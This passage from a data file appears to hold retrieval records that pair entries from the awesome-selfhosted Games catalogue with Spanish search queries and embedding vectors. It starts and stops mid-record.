0.03654, -0.13425, 0.0123, -0.09171, -0.09588, 0.08563, 0.02241, 0.00298, 0.15266, 0.07137, 0.11312, -0.00824, -0.01124, -0.10939, -0.01688, -0.12789, 0.0944, 0.00068, -0.01694, 0.04933, -0.04313, -0.1202, -0.13627, -0.02272, 0.22697, -0.09175, -0.01874, -0.07137, 0.11251, -0.0436, 0.12427, 0.05396, 0.03071, 0.0708, 0.02186, -0.01333, -0.01447, -0.00121, 0.10675, -0.09318, 0.01199, -0.11087, 0.13037, -0.02564, -0.06985, -0.14022, -0.0129, 0.00126, 0.13362, -0.09238, 0.01847, -0.06788, -0.07171, 0.07283, -0.0473, 0.03709, 0.03132, 0.05128, -0.00067, 0.03101, -0.01053, 0.11018, -0.01405, 0.07454, -0.0456, 0.02738, -0.07696, 0.07807, -0.05371, -0.01785, 0.10061, 0.04684, 0.06847, -0.06332, -0.05024, -0.01265, 0.01802, -0.07105, 0.03324, -0.05996, 0.09832, -0.03841, 0.04452, -0.02057, -0.05558, -0.00349, -0.07898, -0.19497, 0.12303, -0.07531, 0.0413, 0.04397, -0.05765, 0.00316, -0.00563, 0.12946, -0.09021, -0.07622, 0.06676, -0.07877, -0.01604, -0.01694, 0.03671, 0.04811, -0.10279, 0.03952, 0.08241, 0.04196, -0.04727, -0.00071, 0.01874, -0.0086, -0.15693, -0.00718, 0.01808, 0.01882, 0.00537, -0.02495, -0.03043, 0.0128, -0.02598, 0.0058, 0.02703, -0.06051, -0.02488, 0.04476, -0.04943, -0.01331, -0.00208, 0.07709, -0.02794, 0.05827, 0.04967, 0.07055, 0.02214, -0.01851, 0.05863, 0.05977, 0.00722, -0.02511, 0.00686, -0.05486, 0.03171, 0.06354, 0.0101, 0.06103, 0.06224, 0.08494, 0.07081, 0.08966, -0.06532, 0.02337, 0.0161, 0.02666, -0.02715, -0.00223, 0.02405, -0.03239, -0.02999, -0.04349, 0.03813, -0.01705, -0.0856, 0.02053, 0.03546, -0.10178, 0.03756, 0.06082, -0.04025, 0.07918, -0.0374, -0.04634, 0.01716, -0.03326, 0.00814, 0.03328, -0.11609, -0.09063, 0.02704, -0.06923, -0.02501, 0.01241, 0.00039, 0.06986, -0.07349, 0.06553, 0.04502, -0.02127, 0.054, -0.01645, -0.044, -0.03378, 0.04367, -0.01127, -0.00888, -0.00898, 0.02125, 0.02776, -0.00549, 0.02614, -0.05122, 0.06069, 0.07781, 0.01508, 0.03493, 0.03139, 0.09562, -0.04303, 0.05312, -0.00818, 0.01843, 0.01946, -0.01938, -0.00947, 0.07375, -0.05641, 0.03714, -0.02826, 0.02739, 0.02165, -0.03539, 0.00351, 0.01594, -0.01111, -0.03736, 0.05621, 0.01197, 0.04753, 0.0662, 0.01037, -0.05536, 0.01886, 0.0168, -0.02031, 0.03017, -0.04446, -0.03293, -0.05498, -0.02578, -0.02015, -0.02782, -0.05024, -0.0807, -0.02896, 0.03298, -0.03354, -0.04496, 0.07634]} -{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: 0 A.D. β€” Cross-platform real-time strategy game of ancient warfare [MIT/GPL-2.0/Zlib, C++/C/deb]. A Dark Room β€” Minimalist text adventure game for your browser [MPL-2.0, Javascript]. DDraceNetwork β€” Cooperative platformer version of DDRace, a Teeworlds modification featuring unique cooperative gameplay [Zlib, C++]. Digibuzzer β€” Create a virtual game room around a connected buzzer (documentation in French) [AGPL-3.0, Nodejs]. Hypersomnia β€” Competitive top-down shooter blending Counter-Strike with Hotline Miami. Runs on Linux, Windows, MacOS and the Web [AGPL-3.0, C++/Docker]. Lila β€” Ad-less chess server powering lichess.org, with official iOS and Android client apps [AGPL-3.0, Scala]. Luanti β€” Voxel game engine (formerly Minetest). Play one of our many games, mod a game to your liking, make your own game, or play on a multiplayer server [LGPL-2.1/MIT/Zlib, C++/Lua/deb]. Mindustry β€” Factorio-like tower defense game. Build production chains to gather more resources, and build complex facilities [GPL-3.0, Java].", "indexar": "cual es una alternativa libre y gratuita a Factorio o juegos tipo torre defensiva", "v": [0.00444, -0.03306, -0.13925, 0.01457, -0.07329, 0.1278, 0.09253, 0.04114, -0.0029, -0.04869, 0.01473, -0.10359, -0.0427, 0.00587, 0.08061, -0.08544, 0.17325, -0.03953, 0.11375, -0.05324, 0.02689, -0.12543, -0.01531, -0.21969, -0.01039, -0.10183, -0.05316, -0.0119, -0.10976, 0.01915, 0.07989, -0.00434, 0.1831, -0.04014, 0.03799, -0.02498, -0.03305, 0.02944, 0.06971, -0.01177, 0.06267, -0.0252, -0.05385, -0.04861, 0.02328, 0.02069, -0.05896, 0.04099, 0.04422, 0.00231, 0.04324, -0.00299, 0.04415, -0.12336, 0.05919, -0.13669, 0.14477, -0.08238, -0.01559, -0.12562, -0.09242, 0.04702, 0.06299, -0.13488, 0.01679, -0.03635, -0.08483, -0.02849, 0.02186, 0.03272, 0.01489, -0.01935, 0.00379, 0.04371, -0.07645, 0.06427, 0.02147, -0.01752, 0.03182, 0.07134, 0.00626, -0.0363, -0.08571, 0.07692, -0.16805, -0.03529, 0.00998, -0.11953, -0.05461, -0.01294, 0.05719, -0.02828, -0.05416, 0.11468, -0.0621, -0.22397, 0.01716, 0.06706, 0.03037, 0.02424, 0.04545, 0.00327, -0.07763, 0.05444, 0.04745, 0.04028, -0.05879, -0.05434, -0.01936, -0.04654, 0.02658, -0.04574, -0.09366, 0.0299, 0.05345, -0.01151, -0.12725, 0.00763, 0.04799, 0.01285, -0.04389, 0.01311, 0.00754, -0.01915, -0.0484, -0.0234, -0.00646, -0.0087, -0.03707, 0.03701, 0.0126, -0.03141, -0.06624, -0.05885, -0.10675, -0.0238, 0.02663, 0.04446, -0.06964, 0.0199, 0.02573, 0.06392, 0.08067, -0.0644, 0.0252, -0.01361, 0.07611, -0.06533, -0.10039, -0.05159, -0.04019, 0.03909, -0.01431, 0.11254, -0.03334, 0.07824, 0.04187, -0.01398, -0.05556, 0.13459, -0.00837, -0.02041, 0.00996, 0.01737, 0.01028, -0.03274, 0.03837, -0.04969, 0.02452, 0.00792, -0.03698, 0.02918, 0.04281, -0.12651, -0.05782, -0.07768, -0.06734, -0.0329, -0.03841, -0.12923, -0.01634, -0.02252, -0.10612, 0.02497, -0.07811, -0.06821, 0.00916, -0.03375, 0.1332, 0.08246, -0.02304, 0.05522, -0.08663, -0.02798, -0.00533, -0.03478, 0.00116, -0.09814, 0.01143, 0.00922, -0.03572, -0.03333, 0.01605, -0.02658, 0.06475, 0.02569, -0.02503, 0.0337, 0.01671, 0.06705, 0.06732, 0.04057, 0.06011, -0.04638, 0.02921, -0.03688, 0.01918, -0.04736, -0.02251, -0.00913, 0.01067, 0.03489, 0.06847, -0.01348, -0.01221, 0.00246, 0.0236, 0.0748, -0.03994, 0.01269, -0.05962, 0.01607, 0.06317, 0.0147, 0.10192, 0.05324, 0.00215, -0.01065, -0.01757, -0.04401, 0.10254, 0.02949, -0.00847, -0.01663, -0.0761, -0.06387, -0.08429, -0.04482, 0.0085, -0.04501, -0.0558, 0.04015, 0.00906, 0.00925, 0.02798, 0.00297]} -{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: MTA:SA β€” Add network play functionality to Rockstar North's Grand Theft Auto game series, in which this functionality is not originally found [⚠, GPL-3.0, C++]. OpenTTD β€” Transport tycoon simulation game [GPL-2.0, C++/Docker]. piqueserver β€” Server for openspades, the first-person shooter in a destructible voxel world [GPL-3.0, Python/C++]. Posio β€” Geography multiplayer game [MIT, Python]. Razzia β€” Quiz game platform, designed for smaller self-hosted events (alternative to Kahoot!) [MIT, Nodejs/Docker]. Red Eclipse 2 β€” Arena first-person shooter similar to Unreal Tournament [Zlib/MIT/CC-BY-SA-4.0, C/C++/deb]. Scribble.rs β€” A web-based pictionary game [BSD-3-Clause, Go/Docker]. Suroi β€” An open-source 2D battle royale game inspired by surviv.io [GPL-3.0, Nodejs]. The Battle for Wesnoth β€” The Battle for Wesnoth is an Open Source, turn-based tactical strategy game with a high fantasy theme, featuring both singleplayer and online/hotseat multiplayer combat [GPL-2.0, C++/deb].", "indexar": "que programa puedo usar para jugar GTA con amigos en casa", "v": [-0.11651, 0.06122, -0.11036, -0.10054, -0.11929, -0.05078, -0.02403, 0.02334, 0.04108, -0.07694, 0.00287, -0.05718, -0.07544, 0.13627, -0.04018, 0.02607, 0.10104, 0.08378, 0.06618, -0.05783, -0.03273, 0.01128, 0.02568, -0.18863, -0.0085, 0.00657, 0.11274, 0.0304, -0.06304, 0.12664, -0.00316, -0.06339, 0.0717, -0.14422, -0.06522, -0.10601, 0.11032, -0.10553, 0.16556, 0.00698, 0.08418, 0.09895, -0.07829, -0.08709, 0.17845, 0.02511, 0.13375, -0.09844, -0.15312, -0.10417, -0.00779, -0.04658, 0.01895, -0.14826, 0.0214, -0.04246, 0.01532, -0.20864, -0.06999, 0.0033, -0.07066, -0.04557, 0.04605, 0.07687, -0.05227, 0.05478, 0.02384, 0.03752, -0.06568, 0.07941, -0.06202, 0.06918, 0.00777, 0.02661, -0.05269, -0.02842, -0.04511, -0.1186, 0.08627, -0.02157, 0.01997, -0.07662, -0.0428, 0.07347, -0.00546, -0.01573, 0.04033, -0.12802, 0.03322, -0.03459, -0.01164, -0.01077, -0.04478, 0.10723, 0.03258, -0.14216, 0.16091, 0.05729, 0.04142, -0.03125, 0.04188, -0.05625, -0.02863, 0.11002, -0.09818, -0.05454, 0.05408, -0.09347, -0.06677, -0.00351, 0.03896, 0.09964, -0.09266, 0.06092, 0.0747, 0.0576, -0.05954, -0.00786, 0.07893, -0.02213, -0.08515, 0.03936, 0.0374, -0.00094, 0.03564, -0.01783, -0.04361, 0.05507, -0.08789, 0.06566, -0.05158, -0.06276, -0.05051, 0.01534, -0.07851, 0.01414, -0.03628, 0.00473, -0.037, 0.02706, 0.05287, 0.05936, 0.03783, -0.01245, 0.08709, 0.05868, 0.0161, -0.02485, -0.024, -0.00684, 0.09609, 0.08027, -0.03732, -0.01781, 0.04197, 0.01917, 0.08322, 0.05201, -0.03884, -0.02553, -0.02403, 0.04638, -0.00478, -0.06071, 0.00983, 0.03029, 0.09398, 0.05304, -0.00594, 0.02895, -0.00146, 0.03631, 0.00883, -0.05948, 0.0178, -0.0056, 0.0318, 0.02063, -0.11312, -0.06045, -0.00293, -0.02103, 0.05972, -0.00943, -0.03473, -0.05357, 0.0001, 0.00171, -0.02149, -0.06769, -0.1117, 0.05328, -0.00593, 0.05946, 0.00603, -0.00302, 0.02964, -0.01018, 0.05722, -0.0267, 0.00185, -0.03177, 0.04075, -0.03588, 0.05498, 0.08557, -0.00061, -0.01307, 0.00792, 0.05312, 0.02666, -0.05161, 0.05543, 0.05609, 0.06084, -0.02001, -0.03034, 0.00959, 0.06415, 0.05915, -0.01393, 0.00797, 0.02007, -0.06229, 0.04069, -0.03883, 0.00046, 0.00244, -0.01898, -0.02143, 0.01393, -0.03382, 0.03172, 0.01222, 0.01821, -0.00397, 0.0115, 0.01298, 0.01301, 0.00028, -0.0122, 0.01176, 0.02635, 0.00433, -0.00307, -0.04237, -0.00232, -0.02837, -0.00984, -0.02716, -0.03662, -0.01794, 0.02651, -0.0498, -0.03974, 0.0942]} -{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: MTA:SA β€” Add network play functionality to Rockstar North's Grand Theft Auto game series, in which this functionality is not originally found [⚠, GPL-3.0, C++]. OpenTTD β€” Transport tycoon simulation game [GPL-2.0, C++/Docker]. piqueserver β€” Server for openspades, the first-person shooter in a destructible voxel world [GPL-3.0, Python/C++]. Posio β€” Geography multiplayer game [MIT, Python]. Razzia β€” Quiz game platform, designed for smaller self-hosted events (alternative to Kahoot!) [MIT, Nodejs/Docker]. Red Eclipse 2 β€” Arena first-person shooter similar to Unreal Tournament [Zlib/MIT/CC-BY-SA-4.0, C/C++/deb]. Scribble.rs β€” A web-based pictionary game [BSD-3-Clause, Go/Docker]. Suroi β€” An open-source 2D battle royale game inspired by surviv.io [GPL-3.0, Nodejs]. The Battle for Wesnoth β€” The Battle for Wesnoth is an Open Source, turn-based tactical strategy game with a high fantasy theme, featuring both singleplayer and online/hotseat multiplayer combat [GPL-2.0, C++/deb].", "indexar": "con quΓ© puedo montar un servidor de shooter en voxels para mi comunidad", "v": [0.10048, -0.03858, -0.17206, -0.03386, -0.21857, -0.05442, 0.01011, -0.11561, 0.10504, -0.16152, -0.086, -0.08058, 0.10283, 0.01003, 0.07305, 0.0872, 0.16191, -0.08074, -0.00723, 0.10153, 0.03426, -0.02661, 0.06837, -0.04819, -0.03209, 0.06917, 0.05958, 0.01355, -0.02223, -0.00013, -0.04515, -0.03955, 0.03384, 0.03854, 0.02729, -0.14748, -0.00081, 0.11085, -0.01286, 0.05652, 0.00807, 0.04094, -0.06491, -0.05533, 0.04, -0.03268, 0.01668, -0.10934, 0.05303, -0.02644, 0.03571, -0.0077, -0.12503, 0.01578, -0.02508, 0.03808, 0.12485, -0.11153, 0.1419, -0.06675, -0.16325, -0.00426, -0.05725, -0.09054, 0.00577, -0.00187, -0.04086, -0.08761, -0.07661, -0.01708, -0.0646, -0.05224, -0.07871, -0.01846, -0.06922, -0.04972, -0.01503, -0.08723, 0.01383, 0.07203, -0.00203, -0.08531, -0.06877, 0.107, -0.11705, -0.01695, -0.02756, -0.11079, 0.0398, 0.02466, 0.08525, 0.03436, -0.06945, 0.04322, 0.07761, -0.07288, 0.05914, 0.08966, -0.08727, 0.01751, 0.02668, -0.05785, -0.0748, 0.08325, 0.02186, -0.06483, 0.04271, -0.04085, 0.05143, -0.05893, 0.07811, 0.01799, -0.05048, -0.03249, -0.08001, -0.187, -0.01007, 0.10143, 0.04841, 0.05073, -0.03222, 0.05619, 0.10002, -0.06797, 0.08727, -0.00532, -0.0379, 0.01875, -0.04224, -0.0673, -0.02002, -0.03764, 0.02795, 0.01531, 0.006, 0.09766, 0.10343, -0.01548, -0.09211, -0.02024, 0.04688, -0.03666, 0.08266, -0.02403, 0.06361, 0.01942, -0.01828, -0.06134, 0.03925, -0.07098, 0.02144, 0.0011, -0.00537, -0.02499, -0.15043, 0.01731, 0.0475, -0.05493, 0.05295, 0.05235, 0.0509, 0.02398, 0.03632, -0.07627, 0.04023, -0.01479, -0.00586, -0.07436, 0.08968, -0.01598, -0.0637, -0.05058, 0.06017, -0.02082, 0.03373, -0.04036, -0.06714, -0.06758, 0.02967, 0.00025, -0.06002, 0.02942, -0.04992, 0.05546, -0.03109, -0.03166, -0.02043, 0.01708, 0.03997, 0.04124, 0.02707, -0.02875, 0.00324, -0.01901, 0.06087, -0.07345, 0.00535, -0.05369, -0.02887, -0.08748, -0.05963, 0.00672, 0.01874, -0.07801, 0.05782, 0.00709, -0.03177, 0.01332, -0.0047, 0.02599, -0.00332, 0.02745, 0.04588, 0.01608, -0.01687, 0.02697, 0.14618, -0.03584, -0.04795, -0.01754, -0.00479, 0.02358, 0.06441, -0.06773, 0.01689, 0.02266, 0.00678, -0.04861, 0.05154, -0.02477, -0.04235, 0.0141, -0.08882, -0.04671, 0.01593, 0.03234, 0.03898, 0.01895, -0.06435, -0.05599, 0.07602, 0.03062, -0.03175, -0.05114, -0.0697, -0.06352, -0.02494, 0.0512, -0.01961, -0.05951, -0.05238, -0.00276, 0.01643, -0.02544, 0.01415, 0.02161]} -{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: MTA:SA β€” Add network play functionality to Rockstar North's Grand Theft Auto game series, in which this functionality is not originally found [⚠, GPL-3.0, C++]. OpenTTD β€” Transport tycoon simulation game [GPL-2.0, C++/Docker]. piqueserver β€” Server for openspades, the first-person shooter in a destructible voxel world [GPL-3.0, Python/C++]. Posio β€” Geography multiplayer game [MIT, Python]. Razzia β€” Quiz game platform, designed for smaller self-hosted events (alternative to Kahoot!) [MIT, Nodejs/Docker]. Red Eclipse 2 β€” Arena first-person shooter similar to Unreal Tournament [Zlib/MIT/CC-BY-SA-4.0, C/C++/deb]. Scribble.rs β€” A web-based pictionary game [BSD-3-Clause, Go/Docker]. Suroi β€” An open-source 2D battle royale game inspired by surviv.io [GPL-3.0, Nodejs]. The Battle for Wesnoth β€” The Battle for Wesnoth is an Open Source, turn-based tactical strategy game with a high fantasy theme, featuring both singleplayer and online/hotseat multiplayer combat [GPL-2.0, C++/deb].", "indexar": "busco una alternativa libre a Kahoot para hacer concursos pequeΓ±os", "v": [0.05786, -0.05197, -0.09471, 0.01212, -0.10771, -0.17764, 0.00107, 0.09085, -0.18059, -0.13785, -0.05606, -0.13966, -0.13598, 0.11069, 0.03264, -0.11642, 0.0732, -0.00919, 0.18234, -0.0195, 0.02289, -0.07247, -0.07224, 0.09222, 0.07801, -0.09438, -0.00137, -0.02668, -0.02969, 0.04345, 0.00276, 0.06845, 0.12067, 0.04177, -0.05294, -0.05322, 0.17984, -0.00469, 0.096, -0.10633, 0.09356, 0.03754, -0.02833, 0.05344, -0.07706, -0.12506, -0.04228, -0.01124, -0.0117, 0.04016, 0.04176, -0.04434, 0.02569, 0.05153, 0.03337, -0.03564, 0.07094, -0.05037, -0.14768, -0.16048, -0.0133, -0.04892, 0.09317, 0.07952, 0.0826, 0.08237, 0.00668, 0.04856, 0.0395, 0.0599, 0.01898, 0.01055, 0.03796, -0.06102, -0.15295, 0.17727, -0.09112, -0.06285, 0.03751, 0.052, -0.07292, -0.02704, 0.07857, 0.05441, -0.02244, -0.03579, 0.0329, -0.05582, 0.06977, 0.05391, 0.08098, 0.03685, 0.09405, 0.0523, -0.07542, -0.05563, 0.03006, 0.01258, 0.01873, 0.0222, -0.01112, -0.03918, -0.17664, -0.0553, -0.09607, 0.01523, 0.00487, 0.03081, -0.09454, 0.02628, -0.01227, -0.01479, 0.06027, 0.03093, -0.00056, 0.03963, 0.01597, 0.01552, 0.05127, 0.02482, -0.05359, -0.00178, -0.00721, 0.00714, 0.10522, 0.01104, 0.11342, -0.0099, -0.01783, 0.01106, 0.11046, -0.02017, -0.13846, 0.01094, -0.02072, 0.01599, 0.11228, 0.04689, 0.0847, 0.02039, -0.06319, -0.0137, -0.02573, -0.09426, -0.0018, 0.02687, -0.01645, -0.05449, 0.04222, -0.04133, -0.02107, -0.05211, -0.03693, 0.12742, 0.0312, -0.03748, -0.00344, -0.01052, -0.00017, 0.07028, -0.03318, -0.04182, -0.05267, -0.04451, -0.00796, 0.05025, 0.03253, -0.02877, -0.08813, -0.02728, -0.00088, 0.06686, 0.00022, -0.03298, 0.05965, 0.01635, -0.00044, -0.02114, 0.00832, -0.08023, 0.04206, 0.03295, -0.03752, 0.07596, 0.03166, -0.04414, 0.05063, -0.03336, 0.04792, 0.01345, -0.05334, -0.02809, -0.02333, 0.01232, -0.00037, 0.07118, 0.10838, -0.05475, -0.02498, 0.05568, -0.01105, 0.01045, -0.00408, -0.05218, -0.05467, 0.00423, -0.00914, 0.03989, 0.03516, 0.06647, 0.01788, 0.03823, -0.00271, 0.02546, -0.00817, 0.09506, 0.01217, -0.04814, 0.05453, -0.02122, -0.01482, -0.03058, 0.02253, 0.09737, -0.06645, 0.0267, 0.04276, -0.08644, 0.06638, 0.02754, 0.0094, -0.06063, -0.03843, 0.04322, 0.02641, -0.04551, -0.04735, 0.07142, 0.06898, 0.02615, 0.04367, 0.02144, -0.00249, 0.04396, -0.02721, -0.02366, -0.00776, -0.05678, 0.00607, 0.02654, -0.0291, 0.00292, -0.01333, 0.04032, -0.0199, 0.00486]} -{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: Veloren β€” Multiplayer RPG. Open-source game inspired by Cube World, Legend of Zelda, Dwarf Fortress and Minecraft [GPL-3.0, Rust]. Zero-K β€” Open Source on Springrts engine. Zero-K is a traditional real time strategy game with a focus on player creativity through terrain manipulation, physics, and a large roster of unique units - all while being balanced to support competitive play [GPL-2.0, Lua].", "indexar": "que juego abierto es para crear mis propias escenarios con fΓ­sicas y unidades?", "v": [-0.07205, 0.06557, -0.14962, -0.14895, -0.04061, -0.08171, -0.08289, -0.02435, 0.0277, -0.13224, -0.02353, 0.046, -0.08378, -0.00108, 0.03424, -0.03411, 0.07301, -0.04766, -0.00435, 0.04915, -0.1191, -0.06532, -0.02913, -0.08692, -0.06804, -0.00467, 0.08226, -0.03761, -0.11653, -0.02435, -0.03021, 0.19915, 0.15467, -0.13846, 0.05683, -0.25563, 0.03929, 0.02168, -0.02403, 0.02613, -0.00122, 0.02145, -0.02644, 0.06831, 0.05123, 0.02954, 0.03067, 0.06367, -0.0419, -0.02003, 0.08408, 0.01884, -0.05839, -0.05493, 0.0479, -0.19265, 0.04952, -0.09288, 0.00827, 0.02768, -0.1222, -0.00287, 0.11888, -0.05927, 0.03798, 0.06079, -0.03463, 0.03621, 0.02736, 0.01031, -0.12232, -0.00983, -0.05176, -0.04652, 0.0063, 0.13605, -0.16453, -0.0961, -0.02024, -0.01855, 0.03125, -0.06554, -0.09677, 0.06512, -0.02194, -0.05241, 0.05291, -0.0081, -0.03067, -0.01239, 0.02127, -0.08485, -0.08509, 0.05862, -0.00071, -0.15182, 0.01325, -0.01345, -0.00634, 0.12492, -0.05362, -0.02755, -0.09744, -0.00953, -0.08379, 0.01147, 0.04608, -0.06039, 0.03987, 0.01175, -0.04757, 0.0689, -0.01157, 0.02338, -0.00726, 0.0548, 0.0142, 0.00608, 0.09842, 0.06065, -0.07717, 0.0036, 0.10257, -0.0415, -0.04786, -0.04777, -0.04223, -0.06039, -0.00155, 0.0509, 0.00883, -0.05112, 0.00633, 0.047, -0.05508, -0.01127, 0.02222, 0.09681, -0.02784, 0.02569, 0.0623, 0.112, 0.03813, -0.11812, 0.065, 0.05385, 0.02252, -0.04408, -0.0665, 0.00056, 0.00633, 0.07693, 0.01024, 0.01213, -0.02856, 0.11401, 0.06989, 0.04596, -0.04842, 0.02629, -0.07855, 0.09316, -0.04634, -0.03269, 0.00083, 0.01629, -0.0396, -0.01307, 0.06356, -0.00139, -0.0758, -0.01091, 0.09306, -0.06327, 0.01984, 0.02446, -0.0598, -0.00484, -0.068, -0.0546, -0.00882, -0.03328, -0.04236, 0.01765, -0.11811, -0.11213, -0.0041, -0.02875, 0.05022, 0.03615, -0.02434, 0.07429, -0.03802, -0.03861, 0.01843, -0.04885, 0.07207, -0.007, -0.07307, 0.02719, 0.02942, 0.05784, -0.01529, -0.01333, -0.0504, 0.05225, -0.02602, 0.05151, -0.03802, 0.02383, 0.04642, -0.03923, 0.05249, 0.05748, 0.0792, 0.00806, 0.04647, 0.034, 0.01054, -0.0351, 0.00819, 0.00327, 0.03778, -0.11645, 0.00323, 0.0213, -0.00114, 0.00899, 0.04079, 0.00538, -0.00372, -0.01491, 0.04712, 0.03305, 0.00238, 0.01878, 0.10806, -0.04, -0.03525, 0.02809, 0.00857, -0.01753, -0.07384, -0.10406, -0.0166, -0.05148, 0.00353, -0.0146, -0.06887, -0.07259, -0.06187, -0.01104, 0.01569, 0.00128, -0.01558, 0.03532]} -{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: Veloren β€” Multiplayer RPG. Open-source game inspired by Cube World, Legend of Zelda, Dwarf Fortress and Minecraft [GPL-3.0, Rust]. Zero-K β€” Open Source on Springrts engine. Zero-K is a traditional real time strategy game with a focus on player creativity through terrain manipulation, physics, and a large roster of unique units - all while being balanced to support competitive play [GPL-2.0, Lua].", "indexar": "hay alguna alternativa libre a Minecraft o Legend of Zelda para jugar en grupo?", "v": [-0.13379, 0.02023, -0.13294, 0.01527, -0.17052, 0.05981, -0.24713, 0.09535, -0.04374, -0.22508, 0.08098, -0.01073, 0.03429, 0.02646, 0.12556, -0.00239, 0.05415, -0.04896, 0.0876, -0.10075, -0.0407, 0.03248, -0.04314, -0.19835, 0.08453, -0.05865, 0.06669, 0.0324, -0.01863, 0.03891, -0.1074, -0.00138, 0.0104, -0.02985, 0.05959, -0.03709, 0.23657, -0.0283, 0.05572, -0.04644, -0.05996, 0.16219, 0.00774, -0.16044, 0.07352, 0.00749, 0.02077, 0.02481, -0.0489, 0.03983, 0.05962, -0.00831, -0.11124, -0.0636, 0.07185, -0.04454, 0.0441, -0.06145, -0.03868, 0.03817, -0.1184, 0.01152, -0.05229, -0.04859, 0.02371, 0.00502, -0.05304, 0.07983, -0.04031, 0.12681, 0.0033, -5e-05, -0.00224, -0.0601, -0.10678, 0.01935, -0.04077, -0.0561, 0.01545, 0.06353, 0.08129, -0.03377, -0.04843, 0.02957, -0.02086, 0.01737, 0.05169, -0.08157, 0.05953, -0.05609, 0.02202, 0.01127, -0.10618, 0.1264, 0.02458, -0.12777, 0.03452, 0.05452, 0.07247, 0.06353, -0.01398, 0.05515, -0.0165, 0.06292, -0.10711, 0.04215, 0.03717, -0.07324, -0.04382, 0.00328, 0.01057, 0.01869, -0.05069, 0.12375, 0.11375, 0.02289, -0.04893, 0.02866, 0.11604, 0.07822, -0.00555, -0.08369, 0.10032, -0.05444, -0.06431, 0.03917, -0.06728, 0.07374, -0.04665, -0.04539, 0.04783, -0.03401, -0.00713, 0.01442, -0.13184, 0.02319, 0.07386, 0.01031, 0.01169, 0.05337, -0.00083, 0.06193, 0.00563, -0.02313, 0.07712, 0.01415, 0.03251, -0.06053, 0.11179, -0.00914, 0.02427, 0.07275, 0.00463, 0.02998, -0.00956, 0.07867, -0.00287, 0.07733, -0.08265, 0.03643, 0.05062, -0.06076, -0.01892, 0.00168, -0.05305, 0.04089, 0.03297, 0.01042, -0.03312, -0.03692, 0.00709, -0.03495, 0.0414, -0.06005, 0.04218, 0.02158, -0.04229, 0.00795, 0.00063, -0.05589, 0.03172, 0.01453, -0.04539, 0.05341, -0.03449, -0.05087, 0.01706, 0.01402, 0.06752, -0.0037, -0.03588, 0.02816, -0.0432, 0.02567, -0.03973, -0.02916, 0.07759, -0.00514, -0.04642, -0.05566, 0.06271, -0.02686, -0.03993, 0.00117, -0.01509, 0.02221, 0.01285, 0.02576, 0.00544, 0.03463, 0.08858, 0.0257, 0.07609, 0.03509, 0.09494, -0.02627, 0.06135, -0.01781, 0.05418, 0.03571, 0.02045, 0.08401, 0.07838, -0.03106, 0.03104, 0.00199, 0.00949, -0.00988, -0.03261, -0.006, 0.0482, -0.0045, 0.01205, 0.06159, 0.01147, 0.03366, 0.05871, 0.06819, -0.02533, 0.04863, 0.03363, -0.00126, 0.0163, -0.00459, -0.02961, -0.03297, -0.02333, -0.01219, -0.04897, -0.03783, -0.03127, -0.02879, 0.01736, -0.02463, 0.01222, 0.02187]} -{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: Veloren β€” Multiplayer RPG. Open-source game inspired by Cube World, Legend of Zelda, Dwarf Fortress and Minecraft [GPL-3.0, Rust]. Zero-K β€” Open Source on Springrts engine. Zero-K is a traditional real time strategy game with a focus on player creativity through terrain manipulation, physics, and a large roster of unique units - all while being balanced to support competitive play [GPL-2.0, Lua].", "indexar": "cual programa puedo usar para hacer juegos de estrategia en tiempo real sin pagar?", "v": [-0.16089, 0.10306, -0.14927, -0.10407, 0.01321, -0.09586, 0.01487, -0.08194, -0.09343, -0.05509, -0.06183, -0.08392, -0.01514, -0.05939, 0.0042, 0.01186, 0.09923, 0.05816, 0.08415, -0.04199, 0.01226, -0.05804, -0.07395, -0.12249, -0.07701, 0.13253, 0.11546, -0.03829, -0.16123, 0.02525, -0.05049, 0.03931, 0.17175, -0.2011, -0.03561, -0.02061, 0.09456, 0.1166, 0.05429, 0.03589, 0.02063, 0.05672, -0.07775, -0.0625, 0.10227, 0.03801, 0.07824, -0.04485, -0.08095, -0.06584, -0.02107, 0.08489, -0.03693, -0.05067, 0.08243, -0.10485, 0.03124, -0.1661, -0.1176, -0.09439, -0.1022, -0.02152, 0.04189, -0.00657, -0.01401, 0.00839, 0.01379, 0.06861, -0.03453, 0.01978, -0.00595, -0.01417, 0.029, 0.04334, -0.03288, 0.04604, 0.05421, -0.11362, -0.01433, -0.0366, 0.03459, -0.11676, -0.0741, 0.15919, -0.10466, -0.0331, 0.05555, -0.09736, -0.0042, -0.06796, -0.04375, 0.05, -0.07133, 0.04881, 0.03017, -0.13454, 0.10654, -0.05463, 0.0675, 0.0858, 0.07657, -0.0863, -0.15122, 0.08298, -0.03489, 0.04544, 0.04427, -0.01191, -0.07178, -0.03669, -0.0642, -0.06354, -0.1329, -0.00367, -0.01262, 0.04583, 0.01415, -0.03379, 0.06635, -0.00955, -0.13879, 0.08453, -0.02141, -0.00445, 0.09701, -0.00454, -0.03328, 